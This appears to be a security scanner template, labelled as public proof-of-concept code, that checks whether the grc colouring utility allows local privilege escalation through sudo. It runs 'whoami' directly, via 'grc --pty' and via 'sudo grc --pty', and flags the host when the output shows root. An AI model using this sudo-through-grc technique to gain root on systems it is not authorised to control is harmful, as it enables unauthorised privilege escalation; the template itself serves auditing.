grc is a command-line utility that enhances the output of other commands with color and style. It is commonly used to improve the readability of command output by adding color highlighting and formatting. grc can be configured to work with various commands and is often used to make log files and command output easier to interpret.
PoC代码[已公开]
id: privesc-grc
info:
name: grc - Privilege Escalation
author: daffainfo
severity: high
description: |
grc is a command-line utility that enhances the output of other commands with color and style. It is commonly used to improve the readability of command output by adding color highlighting and formatting. grc can be configured to work with various commands and is often used to make log files and command output easier to interpret.
reference:
- https://gtfobins.github.io/gtfobins/grc/
metadata:
verified: true
max-request: 3
tags: code,linux,grc,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
grc --pty whoami
- engine:
- sh
- bash
source: |
sudo grc --pty whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4b0a00483046022100aa0da4fa9606716a03728fdacb92e4385d04bc0491115d887e3292bfea3835f10221009606e7d51f737fcd360e1ba6df9e915c3660f422919f7c9c97cf7b8fb7d19e40:922c64590222798bb761d5b6d8e72950